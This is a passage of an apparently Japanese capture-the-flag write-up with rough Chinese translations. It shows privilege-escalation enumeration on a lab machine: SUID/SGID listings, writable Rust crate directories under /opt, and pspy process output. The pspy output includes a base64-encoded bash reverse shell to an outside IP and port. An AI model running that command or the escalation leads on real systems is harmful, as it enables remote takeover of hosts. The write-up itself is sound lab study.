-rwsr-xr-x 1 root root 35K Feb 21  2022 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 59K Nov 24  2022 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 44K Nov 24  2022 /usr/bin/chsh
-rwsr-xr-x 1 root root 72K Nov 24  2022 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 40K Nov 24  2022 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 55K Feb 21  2022 /usr/bin/su
-rwsr-xr-x 1 root root 35K Mar 23  2022 /usr/bin/fusermount3

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                            
-rwxr-sr-x 1 root shadow 23K Feb  2 09:21 /usr/sbin/pam_extrausers_chkpwd                                                                                   
-rwxr-sr-x 1 root shadow 27K Feb  2 09:21 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 15K Mar 24  2022 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root tty 23K Feb 21  2022 /usr/bin/wall
-rwxr-sr-x 1 root _ssh 287K Nov 23  2022 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 23K Nov 24  2022 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71K Nov 24  2022 /usr/bin/chage
-rwxr-sr-x 1 root crontab 39K Mar 23  2022 /usr/bin/crontab
-rwxr-sr-x 1 root tty 23K Feb 21  2022 /usr/bin/write.ul (Unknown SGID binary)


...省略


╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                           
  Group silentobserver:                                                                                                                                     
/opt/crates/logger/.git                                                                                                                                     
/opt/crates/logger/.git/config
/opt/crates/logger/.git/description
/opt/crates/logger/.git/HEAD
/opt/crates/logger/.git/info/exclude
/opt/crates/logger/.git/hooks/update.sample
/opt/crates/logger/.git/hooks/post-update.sample
/opt/crates/logger/.git/hooks/fsmonitor-watchman.sample
/opt/crates/logger/.git/hooks/pre-rebase.sample
/opt/crates/logger/.git/hooks/pre-merge-commit.sample
#)You_can_write_even_more_files_inside_last_directory

/opt/crates/logger/.git/objects
/opt/crates/logger/.git/objects/info
/opt/crates/logger/.git/objects/pack
/opt/crates/logger/.git/refs
/opt/crates/logger/.git/refs/heads
/opt/crates/logger/.git/refs/tags
/opt/crates/logger/.gitignore
/opt/crates/logger/target
/opt/crates/logger/target/CACHEDIR.TAG
/opt/crates/logger/target/.rustc_info.json
/opt/crates/logger/target/debug
/opt/crates/logger/target/debug/liblogger.d
/opt/crates/logger/target/debug/.cargo-lock
/opt/crates/logger/target/debug/.fingerprint
/opt/crates/logger/target/debug/.fingerprint/iana-time-zone-7aac1b520ad2eb1f
/opt/crates/logger/target/debug/.fingerprint/iana-time-zone-7aac1b520ad2eb1f/lib-iana-time-zone.json
/opt/crates/logger/target/debug/.fingerprint/iana-time-zone-7aac1b520ad2eb1f/invoked.timestamp
/opt/crates/logger/target/debug/.fingerprint/iana-time-zone-7aac1b520ad2eb1f/dep-lib-iana-time-zone
/opt/crates/logger/target/debug/.fingerprint/iana-time-zone-7aac1b520ad2eb1f/lib-iana-time-zone
/opt/crates/logger/target/debug/.fingerprint/libc-e8e4fbca97cf3b0d
/opt/crates/logger/target/debug/.fingerprint/libc-e8e4fbca97cf3b0d/dep-build-script-build-script-build
/opt/crates/logger/target/debug/.fingerprint/libc-e8e4fbca97cf3b0d/invoked.timestamp
/opt/crates/logger/target/debug/.fingerprint/libc-e8e4fbca97cf3b0d/build-script-build-script-build
/opt/crates/logger/target/debug/.fingerprint/libc-e8e4fbca97cf3b0d/build-script-build-script-build.json
/opt/crates/logger/target/debug/.fingerprint/libc-c54205ffac66e97a
/opt/crates/logger/target/debug/.fingerprint/libc-c54205ffac66e97a/dep-lib-libc
/opt/crates/logger/target/debug/.fingerprint/libc-c54205ffac66e97a/lib-libc.json
/opt/crates/logger/target/debug/.fingerprint/libc-c54205ffac66e97a/lib-libc
/opt/crates/logger/target/debug/.fingerprint/libc-c54205ffac66e97a/invoked.timestamp
/opt/crates/logger/target/debug/.fingerprint/logger-d0ec122b4978c5b5
/opt/crates/logger/target/debug/.fingerprint/logger-d0ec122b4978c5b5/dep-lib-logger
/opt/crates/logger/target/debug/.fingerprint/logger-d0ec122b4978c5b5/lib-logger
/opt/crates/logger/target/debug/.fingerprint/logger-d0ec122b4978c5b5/invoked.timestamp
/opt/crates/logger/target/debug/.fingerprint/logger-d0ec122b4978c5b5/lib-logger.json
/opt/crates/logger/target/debug/.fingerprint/chrono-0f6e387a37547029
/opt/crates/logger/target/debug/.fingerprint/chrono-0f6e387a37547029/dep-lib-chrono
/opt/crates/logger/target/debug/.fingerprint/chrono-0f6e387a37547029/lib-chrono.json
/opt/crates/logger/target/debug/.fingerprint/chrono-0f6e387a37547029/invoked.timestamp
/opt/crates/logger/target/debug/.fingerprint/chrono-0f6e387a37547029/lib-chrono
/opt/crates/logger/target/debug/.fingerprint/autocfg-072a15be3dca763c
/opt/crates/logger/target/debug/.fingerprint/autocfg-072a15be3dca763c/lib-autocfg.json
/opt/crates/logger/target/debug/.fingerprint/autocfg-072a15be3dca763c/lib-autocfg
/opt/crates/logger/target/debug/.fingerprint/autocfg-072a15be3dca763c/dep-lib-autocfg
/opt/crates/logger/target/debug/.fingerprint/autocfg-072a15be3dca763c/invoked.timestamp
/opt/crates/logger/target/debug/.fingerprint/num-integer-a2045520f7fb6700
/opt/crates/logger/target/debug/.fingerprint/num-integer-a2045520f7fb6700/lib-num-integer
/opt/crates/logger/target/debug/.fingerprint/num-integer-a2045520f7fb6700/lib-num-integer.json
/opt/crates/logger/target/debug/.fingerprint/num-integer-a2045520f7fb6700/invoked.timestamp
/opt/crates/logger/target/debug/.fingerprint/num-integer-a2045520f7fb6700/dep-lib-num-integer
/opt/crates/logger/target/debug/.fingerprint/num-integer-741b6676734793e3
/opt/crates/logger/target/debug/.fingerprint/num-integer-741b6676734793e3/dep-build-script-build-script-build
/opt/crates/logger/target/debug/.fingerprint/num-integer-741b6676734793e3/invoked.timestamp
/opt/crates/logger/target/debug/.fingerprint/num-integer-741b6676734793e3/build-script-build-script-build
/opt/crates/logger/target/debug/.fingerprint/num-integer-741b6676734793e3/build-script-build-script-build.json
/opt/crates/logger/target/debug/.fingerprint/num-traits-42542d5853acec68
/opt/crates/logger/target/debug/.fingerprint/num-traits-42542d5853acec68/lib-num-traits
/opt/crates/logger/target/debug/.fingerprint/num-traits-42542d5853acec68/lib-num-traits.json
/opt/crates/logger/target/debug/.fingerprint/num-traits-42542d5853acec68/invoked.timestamp
/opt/crates/logger/target/debug/.fingerprint/num-traits-42542d5853acec68/dep-lib-num-traits
/opt/crates/logger/target/debug/.fingerprint/num-integer-5fcd1eb1caf5030a
/opt/crates/logger/target/debug/.fingerprint/num-integer-5fcd1eb1caf5030a/run-build-script-build-script-build
/opt/crates/logger/target/debug/.fingerprint/num-integer-5fcd1eb1caf5030a/run-build-script-build-script-build.json
/opt/crates/logger/target/debug/.fingerprint/logger-5690f2601dcb9cf3
/opt/crates/logger/target/debug/.fingerprint/logger-5690f2601dcb9cf3/dep-lib-logger
/opt/crates/logger/target/debug/.fingerprint/logger-5690f2601dcb9cf3/lib-logger
/opt/crates/logger/target/debug/.fingerprint/logger-5690f2601dcb9cf3/invoked.timestamp
/opt/crates/logger/target/debug/.fingerprint/logger-5690f2601dcb9cf3/lib-logger.json
/opt/crates/logger/target/debug/.fingerprint/num-traits-09ce1320563f1729
/opt/crates/logger/target/debug/.fingerprint/num-traits-09ce1320563f1729/run-build-script-build-script-build
/opt/crates/logger/target/debug/.fingerprint/num-traits-09ce1320563f1729/run-build-script-build-script-build.json
/opt/crates/logger/target/debug/.fingerprint/libc-85bfbc0004d699f9
/opt/crates/logger/target/debug/.fingerprint/libc-85bfbc0004d699f9/run-build-script-build-script-build
/opt/crates/logger/target/debug/.fingerprint/libc-85bfbc0004d699f9/run-build-script-build-script-build.json
/opt/crates/logger/target/debug/.fingerprint/time-9436ff2a3ed7b95b
/opt/crates/logger/target/debug/.fingerprint/time-9436ff2a3ed7b95b/dep-lib-time
/opt/crates/logger/target/debug/.fingerprint/time-9436ff2a3ed7b95b/invoked.timestamp
/opt/crates/logger/target/debug/.fingerprint/time-9436ff2a3ed7b95b/lib-time
/opt/crates/logger/target/debug/.fingerprint/time-9436ff2a3ed7b95b/lib-time.json
/opt/crates/logger/target/debug/.fingerprint/num-traits-054271c35184efb6
/opt/crates/logger/target/debug/.fingerprint/num-traits-054271c35184efb6/dep-build-script-build-script-build
/opt/crates/logger/target/debug/.fingerprint/num-traits-054271c35184efb6/invoked.timestamp
/opt/crates/logger/target/debug/.fingerprint/num-traits-054271c35184efb6/build-script-build-script-build
/opt/crates/logger/target/debug/.fingerprint/num-traits-054271c35184efb6/build-script-build-script-build.json
/opt/crates/logger/target/debug/build
/opt/crates/logger/target/debug/build/libc-e8e4fbca97cf3b0d
/opt/crates/logger/target/debug/build/libc-e8e4fbca97cf3b0d/build_script_build-e8e4fbca97cf3b0d.d
/opt/crates/logger/target/debug/build/libc-e8e4fbca97cf3b0d/build_script_build-e8e4fbca97cf3b0d
/opt/crates/logger/target/debug/build/libc-e8e4fbca97cf3b0d/build-script-build
/opt/crates/logger/target/debug/build/num-integer-741b6676734793e3
/opt/crates/logger/target/debug/build/num-integer-741b6676734793e3/build-script-build
/opt/crates/logger/target/debug/build/num-integer-741b6676734793e3/build_script_build-741b6676734793e3.d
/opt/crates/logger/target/debug/build/num-integer-741b6676734793e3/build_script_build-741b6676734793e3
/opt/crates/logger/target/debug/build/num-integer-5fcd1eb1caf5030a
/opt/crates/logger/target/debug/build/num-integer-5fcd1eb1caf5030a/stderr
/opt/crates/logger/target/debug/build/num-integer-5fcd1eb1caf5030a/invoked.timestamp
/opt/crates/logger/target/debug/build/num-integer-5fcd1eb1caf5030a/out
/opt/crates/logger/target/debug/build/num-integer-5fcd1eb1caf5030a/out/probe1.ll
/opt/crates/logger/target/debug/build/num-integer-5fcd1eb1caf5030a/out/probe0.ll
/opt/crates/logger/target/debug/build/num-integer-5fcd1eb1caf5030a/root-output
/opt/crates/logger/target/debug/build/num-integer-5fcd1eb1caf5030a/output
/opt/crates/logger/target/debug/build/num-traits-09ce1320563f1729
/opt/crates/logger/target/debug/build/num-traits-09ce1320563f1729/stderr
/opt/crates/logger/target/debug/build/num-traits-09ce1320563f1729/invoked.timestamp
/opt/crates/logger/target/debug/build/num-traits-09ce1320563f1729/out
/opt/crates/logger/target/debug/build/num-traits-09ce1320563f1729/out/probe5.ll
/opt/crates/logger/target/debug/build/num-traits-09ce1320563f1729/out/probe2.ll
/opt/crates/logger/target/debug/build/num-traits-09ce1320563f1729/out/probe3.ll
/opt/crates/logger/target/debug/build/num-traits-09ce1320563f1729/out/probe1.ll
/opt/crates/logger/target/debug/build/num-traits-09ce1320563f1729/out/probe0.ll
#)You_can_write_even_more_files_inside_last_directory

/opt/crates/logger/target/debug/build/num-traits-09ce1320563f1729/root-output
/opt/crates/logger/target/debug/build/num-traits-09ce1320563f1729/output
/opt/crates/logger/target/debug/build/libc-85bfbc0004d699f9
/opt/crates/logger/target/debug/build/libc-85bfbc0004d699f9/stderr
/opt/crates/logger/target/debug/build/libc-85bfbc0004d699f9/invoked.timestamp
/opt/crates/logger/target/debug/build/libc-85bfbc0004d699f9/out
/opt/crates/logger/target/debug/build/libc-85bfbc0004d699f9/root-output
/opt/crates/logger/target/debug/build/libc-85bfbc0004d699f9/output
/opt/crates/logger/target/debug/build/num-traits-054271c35184efb6
/opt/crates/logger/target/debug/build/num-traits-054271c35184efb6/build-script-build
/opt/crates/logger/target/debug/build/num-traits-054271c35184efb6/build_script_build-054271c35184efb6.d
/opt/crates/logger/target/debug/build/num-traits-054271c35184efb6/build_script_build-054271c35184efb6
/opt/crates/logger/target/debug/examples
/opt/crates/logger/target/debug/deps
/opt/crates/logger/target/debug/deps/time-9436ff2a3ed7b95b.d
/opt/crates/logger/target/debug/deps/libc-c54205ffac66e97a.d
/opt/crates/logger/target/debug/deps/logger-d0ec122b4978c5b5.d
/opt/crates/logger/target/debug/deps/libtime-9436ff2a3ed7b95b.rmeta
/opt/crates/logger/target/debug/deps/iana_time_zone-7aac1b520ad2eb1f.d
#)You_can_write_even_more_files_inside_last_directory

/opt/crates/logger/target/debug/liblogger.rlib
/opt/crates/logger/target/debug/incremental
/opt/crates/logger/target/debug/incremental/logger-16l10cpwxmikv
/opt/crates/logger/target/debug/incremental/logger-16l10cpwxmikv/s-gkngn1ezwn-1qwt1k7-rv25v9d2xrqf
/opt/crates/logger/target/debug/incremental/logger-16l10cpwxmikv/s-gkngn1ezwn-1qwt1k7-rv25v9d2xrqf/query-cache.bin
/opt/crates/logger/target/debug/incremental/logger-16l10cpwxmikv/s-gkngn1ezwn-1qwt1k7-rv25v9d2xrqf/work-products.bin
/opt/crates/logger/target/debug/incremental/logger-16l10cpwxmikv/s-gkngn1ezwn-1qwt1k7-rv25v9d2xrqf/dep-graph.bin
/opt/crates/logger/target/debug/incremental/logger-16l10cpwxmikv/s-gkngn1ezwn-1qwt1k7-rv25v9d2xrqf/49k60jy3m1d6pwzq.o
/opt/crates/logger/target/debug/incremental/logger-2jmeim557iqyj
/opt/crates/logger/target/debug/incremental/logger-2jmeim557iqyj/s-gkngr1xa84-1hq9ijz-eg92mkt9tcd7
/opt/crates/logger/target/debug/incremental/logger-2jmeim557iqyj/s-gkngr1xa84-1hq9ijz-eg92mkt9tcd7/2x7k16mja2azfsop.o
/opt/crates/logger/target/debug/incremental/logger-2jmeim557iqyj/s-gkngr1xa84-1hq9ijz-eg92mkt9tcd7/f6i3bax9e7doz58.o
/opt/crates/logger/target/debug/incremental/logger-2jmeim557iqyj/s-gkngr1xa84-1hq9ijz-eg92mkt9tcd7/4vufgf0qbknj4x8t.o
/opt/crates/logger/target/debug/incremental/logger-2jmeim557iqyj/s-gkngr1xa84-1hq9ijz-eg92mkt9tcd7/l9d3tyk598o0lng.o
/opt/crates/logger/target/debug/incremental/logger-2jmeim557iqyj/s-gkngr1xa84-1hq9ijz-eg92mkt9tcd7/2s7he0okzzmkeeo0.o
#)You_can_write_even_more_files_inside_last_directory

/opt/crates/logger/src
/opt/crates/logger/src/lib.rs



                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════                                                                         
                            ╚═════════════════════════╝                                                                                                     
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path                                                                  
/usr/bin/gettext.sh                                                                                                                                         
/usr/bin/rescan-scsi-bus.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2023-06-06+12:27:21.2341763860 /usr/local/sbin/laurel                                                                                                       
2023-06-06+09:04:49.6751756730 /opt/tipnet/target/debug/build/native-tls-ffa598d30b3d77a6/build_script_build-ffa598d30b3d77a6
2023-06-06+09:04:49.6751756730 /opt/tipnet/target/debug/build/native-tls-ffa598d30b3d77a6/build-script-build
2023-06-06+09:04:46.3191826440 /opt/tipnet/target/debug/build/io-enum-011249f210b975ac/build_script_build-011249f210b975ac
2023-06-06+09:04:46.3191826440 /opt/tipnet/target/debug/build/io-enum-011249f210b975ac/build-script-build
2023-06-06+09:04:37.2472006450 /opt/tipnet/target/debug/deps/libthiserror_impl-451617f089ec790a.so
2023-06-06+09:04:22.6472280510 /opt/tipnet/target/debug/deps/libfrunk_derives-7ae1da3c903b58f5.so
2023-06-06+09:04:20.6352315610 /opt/tipnet/target/debug/deps/libopenssl_macros-a7ea67685af3831b.so
2023-06-06+09:03:56.6952703760 /opt/tipnet/target/debug/build/mysql_common-c31e656c1eadcb65/build_script_build-c31e656c1eadcb65
2023-06-06+09:03:56.6952703760 /opt/tipnet/target/debug/build/mysql_common-c31e656c1eadcb65/build-script-build
2023-06-06+09:03:52.3432768520 /opt/tipnet/target/debug/build/rust_decimal-039d5f8f1c526771/build_script_build-039d5f8f1c526771
2023-06-06+09:03:52.3432768520 /opt/tipnet/target/debug/build/rust_decimal-039d5f8f1c526771/build-script-build
2023-06-06+09:03:50.1312798620 /opt/tipnet/target/debug/build/crossbeam-queue-ef4a6c84aaba7c7b/build_script_build-ef4a6c84aaba7c7b
2023-06-06+09:03:50.1312798620 /opt/tipnet/target/debug/build/crossbeam-queue-ef4a6c84aaba7c7b/build-script-build
2023-06-06+09:03:47.1392840400 /opt/tipnet/target/debug/build/thiserror-b8820a5d17e0b3c5/build_script_build-b8820a5d17e0b3c5
2023-06-06+09:03:47.1392840400 /opt/tipnet/target/debug/build/thiserror-b8820a5d17e0b3c5/build-script-build
2023-06-06+09:03:45.1352867150 /opt/tipnet/target/debug/build/log-ff9463ec8ab06410/build_script_build-ff9463ec8ab06410
2023-06-06+09:03:45.1352867150 /opt/tipnet/target/debug/build/log-ff9463ec8ab06410/build-script-build
2023-06-06+09:03:44.1312879360 /opt/tipnet/target/debug/build/serde_json-22149c4aeaa972fb/build_script_build-22149c4aeaa972fb
2023-06-06+09:03:44.1312879360 /opt/tipnet/target/debug/build/serde_json-22149c4aeaa972fb/build-script-build
2023-06-06+09:03:41.7912910740 /opt/tipnet/target/debug/build/openssl-98cb81c8a981a9c4/build_script_build-98cb81c8a981a9c4
2023-06-06+09:03:41.7912910740 /opt/tipnet/target/debug/build/openssl-98cb81c8a981a9c4/build-script-build
2023-06-06+09:02:58.7273352040 /opt/tipnet/target/debug/deps/libfrunk_proc_macros_impl-70b8a9b0743718dd.so
2023-06-06+09:02:47.3993427600 /opt/tipnet/target/debug/build/crc32fast-3a962b51032ba04b/build_script_build-3a962b51032ba04b
2023-06-06+09:02:47.3993427600 /opt/tipnet/target/debug/build/crc32fast-3a962b51032ba04b/build-script-build
2023-06-06+09:02:46.4913432420 /opt/tipnet/target/debug/build/radium-6e1c80ef27594346/build_script_build-6e1c80ef27594346
2023-06-06+09:02:46.4913432420 /opt/tipnet/target/debug/build/radium-6e1c80ef27594346/build-script-build
2023-06-06+09:02:43.2873449690 /opt/tipnet/target/debug/build/crossbeam-epoch-bbc25096414404da/build_script_build-bbc25096414404da
2023-06-06+09:02:43.2873449690 /opt/tipnet/target/debug/build/crossbeam-epoch-bbc25096414404da/build-script-build
2023-06-06+09:02:42.3273454270 /opt/tipnet/target/debug/build/num-bigint-80c45158563effe8/build_script_build-80c45158563effe8
2023-06-06+09:02:42.3273454270 /opt/tipnet/target/debug/build/num-bigint-80c45158563effe8/build-script-build
2023-06-06+09:02:41.3793460110 /opt/tipnet/target/debug/build/libz-sys-d913944b0b222f9c/build_script_build-d913944b0b222f9c
2023-06-06+09:02:41.3793460110 /opt/tipnet/target/debug/build/libz-sys-d913944b0b222f9c/build-script-build
2023-06-06+09:02:41.3073460470 /opt/tipnet/target/debug/build/ahash-b8e0c13730adb10f/build_script_build-b8e0c13730adb10f
2023-06-06+09:02:41.3073460470 /opt/tipnet/target/debug/build/ahash-b8e0c13730adb10f/build-script-build
2023-06-06+09:02:38.8993472210 /opt/tipnet/target/debug/deps/libproc_macro_hack-338079cfd6e0fab0.so
2023-06-06+09:01:49.3233526430 /opt/tipnet/target/debug/build/bindgen-942dd9ddb582c6c7/build_script_build-942dd9ddb582c6c7
2023-06-06+09:01:49.3233526430 /opt/tipnet/target/debug/build/bindgen-942dd9ddb582c6c7/build-script-build
2023-06-06+09:01:48.1273523420 /opt/tipnet/target/debug/build/serde-053745b1dd5787e3/build_script_build-053745b1dd5787e3
2023-06-06+09:01:48.1273523420 /opt/tipnet/target/debug/build/serde-053745b1dd5787e3/build-script-build
2023-06-06+09:01:47.6553521440 /opt/tipnet/target/debug/build/memchr-502db78709902300/build_script_build-502db78709902300
2023-06-06+09:01:47.6553521440 /opt/tipnet/target/debug/build/memchr-502db78709902300/build-script-build
2023-06-06+09:01:45.2353514060 /opt/tipnet/target/debug/build/memoffset-ba3486e94bf79900/build_script_build-ba3486e94bf79900
2023-06-06+09:01:45.2353514060 /opt/tipnet/target/debug/build/memoffset-ba3486e94bf79900/build-script-build
2023-06-06+09:01:29.6153444480 /opt/tipnet/target/debug/build/proc-macro-hack-f2350608b88a8421/build_script_build-f2350608b88a8421
2023-06-06+09:01:29.6153444480 /opt/tipnet/target/debug/build/proc-macro-hack-f2350608b88a8421/build-script-build
2023-06-06+09:01:26.1233423630 /opt/tipnet/target/debug/build/openssl-sys-a9d0beb7bded8fa0/build_script_main-a9d0beb7bded8fa0
2023-06-06+09:01:26.1233423630 /opt/tipnet/target/debug/build/openssl-sys-a9d0beb7bded8fa0/build-script-main
2023-06-06+09:01:19.4753378290 /opt/tipnet/target/debug/build/crossbeam-utils-96ced3ece230a988/build_script_build-96ced3ece230a988
2023-06-06+09:01:19.4753378290 /opt/tipnet/target/debug/build/crossbeam-utils-96ced3ece230a988/build-script-build
2023-06-06+09:01:17.5233363890 /opt/tipnet/target/debug/build/num-integer-d392f433a27a7e8f/build_script_build-d392f433a27a7e8f
2023-06-06+09:01:17.5233363890 /opt/tipnet/target/debug/build/num-integer-d392f433a27a7e8f/build-script-build
2023-06-06+09:01:09.4673296210 /opt/tipnet/target/debug/build/clang-sys-1cc8cae5b70fdb56/build_script_build-1cc8cae5b70fdb56
2023-06-06+09:01:09.4673296210 /opt/tipnet/target/debug/build/clang-sys-1cc8cae5b70fdb56/build-script-build
2023-06-06+09:01:05.7473261870 /opt/tipnet/target/debug/build/libc-279cc61ca8877276/build_script_build-279cc61ca8877276
2023-06-06+09:01:05.7473261870 /opt/tipnet/target/debug/build/libc-279cc61ca8877276/build-script-build
2023-06-06+09:01:01.3793218140 /opt/tipnet/target/debug/build/memchr-184f1ae267187935/build_script_build-184f1ae267187935
2023-06-06+09:01:01.3793218140 /opt/tipnet/target/debug/build/memchr-184f1ae267187935/build-script-build
2023-06-06+09:00:48.9193075680 /opt/tipnet/target/debug/build/num-traits-7fd62de46f3f8911/build_script_build-7fd62de46f3f8911
2023-06-06+09:00:48.9193075680 /opt/tipnet/target/debug/build/num-traits-7fd62de46f3f8911/build-script-build
2023-06-06+09:00:34.4992878130 /opt/tipnet/target/debug/build/generic-array-d325ee8e5ee2eb41/build_script_build-d325ee8e5ee2eb41
2023-06-06+09:00:34.4992878130 /opt/tipnet/target/debug/build/generic-array-d325ee8e5ee2eb41/build-script-build
2023-06-06+09:00:30.9232822170 /opt/tipnet/target/debug/build/typenum-c232b56f3520f8b9/build_script_main-c232b56f3520f8b9
2023-06-06+09:00:30.9232822170 /opt/tipnet/target/debug/build/typenum-c232b56f3520f8b9/build-script-main
2023-06-06+09:00:14.1952534090 /opt/tipnet/target/debug/build/syn-7725592242a0df22/build_script_build-7725592242a0df22
2023-06-06+09:00:14.1952534090 /opt/tipnet/target/debug/build/syn-7725592242a0df22/build-script-build
2023-06-06+09:00:03.0592313750 /opt/tipnet/target/debug/build/libc-8970438a9de4df5b/build_script_build-8970438a9de4df5b
2023-06-06+09:00:03.0592313750 /opt/tipnet/target/debug/build/libc-8970438a9de4df5b/build-script-build
2023-06-06+09:00:03.0432313410 /opt/tipnet/target/debug/build/quote-bb19dfe6e14f8031/build_script_build-bb19dfe6e14f8031
2023-06-06+09:00:03.0432313410 /opt/tipnet/target/debug/build/quote-bb19dfe6e14f8031/build-script-build

╔══════════╣ Unexpected in /opt (usually empty)
total 16                                                                                                                                                    
drwxr-xr-x  4 root root  4096 Jun 21 06:48 .
drwxr-xr-x 19 root root  4096 Jun  7 13:53 ..
drwxr-xr-x  3 root atlas 4096 May  4 17:26 crates
drwxr-xr-x  5 root atlas 4096 Jun  6 11:49 tipnet

...省略

こんな感じで気になるやつが沢山出てきた。 很多事情都是这样出来的。
SUIDがついてるファイルが多くあったり、/opt配下が沢山あり、writableの階層があったりと…
SUID 下有很多文件,/opt 下有很多文件,还有可写的层次结构等。

どう料理してやろうか… 我不会做饭…

pspy

pspyも動かします。 PSPY 也有效。
pspyの実行ファイルを以下のサイトから入手。64bit版をダウンロード。
从以下站点获取 pspy 可执行文件。 下载 64 位版本。

起動。 起动。

silentobserver@sandworm:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/06/21 06:54:53 CMD: UID=1001  PID=42514  | ./pspy64 
2023/06/21 06:54:53 CMD: UID=1001  PID=42503  | -bash 
2023/06/21 06:54:53 CMD: UID=1001  PID=42502  | sshd: silentobserver@pts/1 
2023/06/21 06:54:53 CMD: UID=0     PID=42446  | sshd: silentobserver [priv] 
2023/06/21 06:54:53 CMD: UID=1001  PID=31974  | /usr/bin/gpg-agent --supervised 
2023/06/21 06:54:53 CMD: UID=0     PID=31957  | 
2023/06/21 06:54:53 CMD: UID=0     PID=23463  | 
2023/06/21 06:54:53 CMD: UID=0     PID=23199  | 
2023/06/21 06:54:53 CMD: UID=0     PID=23198  | 
2023/06/21 06:54:53 CMD: UID=1001  PID=23033  | -bash 
2023/06/21 06:54:53 CMD: UID=1001  PID=23030  | sshd: silentobserver@pts/0 
2023/06/21 06:54:53 CMD: UID=1001  PID=22946  | (sd-pam) 
2023/06/21 06:54:53 CMD: UID=1001  PID=22945  | /lib/systemd/systemd --user 
2023/06/21 06:54:53 CMD: UID=0     PID=22923  | sshd: silentobserver [priv] 
2023/06/21 06:54:53 CMD: UID=0     PID=22622  | 
2023/06/21 06:54:53 CMD: UID=1000  PID=21716  | 
2023/06/21 06:54:53 CMD: UID=1000  PID=21544  | bash -i 
2023/06/21 06:54:53 CMD: UID=1000  PID=21543  | bash 
2023/06/21 06:54:53 CMD: UID=1000  PID=21540  | /bin/sh -c echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMTQvNDQ0NCAwPiYx | base64 -d | bash 
2023/06/21 06:54:53 CMD: UID=1000  PID=21467  | python3 -c import glob; print([p for p in glob.glob('/**/*', recursive=True)]) 
2023/06/21 06:54:53 CMD: UID=1000  PID=21313  | bash -i 
2023/06/21 06:54:53 CMD: UID=1000  PID=21312  | bash 
2023/06/21 06:54:53 CMD: UID=1000  PID=21309  | /bin/sh -c echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMTQvNDQ0NCAwPiYx | base64 -d | bash 
2023/06/21 06:54:53 CMD: UID=0     PID=12511  | 
2023/06/21 06:54:53 CMD: UID=0     PID=5955   | /usr/libexec/upowerd 
2023/06/21 06:54:53 CMD: UID=1000  PID=4418   | scdaemon --multi-server 
2023/06/21 06:54:53 CMD: UID=1000  PID=4416   | gpg-agent --homedir /home/atlas/.gnupg --use-standard-socket --daemon 
2023/06/21 06:54:53 CMD: UID=0     PID=1417   | 
2023/06/21 06:54:53 CMD: UID=114   PID=1234   | /usr/sbin/mysqld 
2023/06/21 06:54:53 CMD: UID=1000  PID=1233   | /usr/bin/python3 /usr/local/sbin/flask run 
2023/06/21 06:54:53 CMD: UID=33    PID=1221   | nginx: worker process                            
2023/06/21 06:54:53 CMD: UID=33    PID=1220   | nginx: worker process                            
2023/06/21 06:54:53 CMD: UID=0     PID=1219   | nginx: master process /usr/sbin/nginx -g daemon on; master_process on; 
2023/06/21 06:54:53 CMD: UID=0     PID=1211   | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 
2023/06/21 06:54:53 CMD: UID=0     PID=1208   | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2023/06/21 06:54:53 CMD: UID=1000  PID=1204   | /usr/local/bin/firejail --profile=webapp flask run 
2023/06/21 06:54:53 CMD: UID=0     PID=1186   | /usr/sbin/cron -f -P 
2023/06/21 06:54:53 CMD: UID=1000  PID=1182   | /usr/local/bin/firejail --profile=webapp flask run 
2023/06/21 06:54:53 CMD: UID=0     PID=1005   | /usr/sbin/ModemManager 
2023/06/21 06:54:53 CMD: UID=0     PID=976    | /usr/libexec/udisks2/udisksd 
2023/06/21 06:54:53 CMD: UID=0     PID=975    | /lib/systemd/systemd-logind 
2023/06/21 06:54:53 CMD: UID=104   PID=974    | /usr/sbin/rsyslogd -n -iNONE 
2023/06/21 06:54:53 CMD: UID=0     PID=973    | /usr/libexec/polkitd --no-debug 
2023/06/21 06:54:53 CMD: UID=0     PID=972    | /usr/sbin/irqbalance --foreground 
2023/06/21 06:54:53 CMD: UID=103   PID=967    | @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
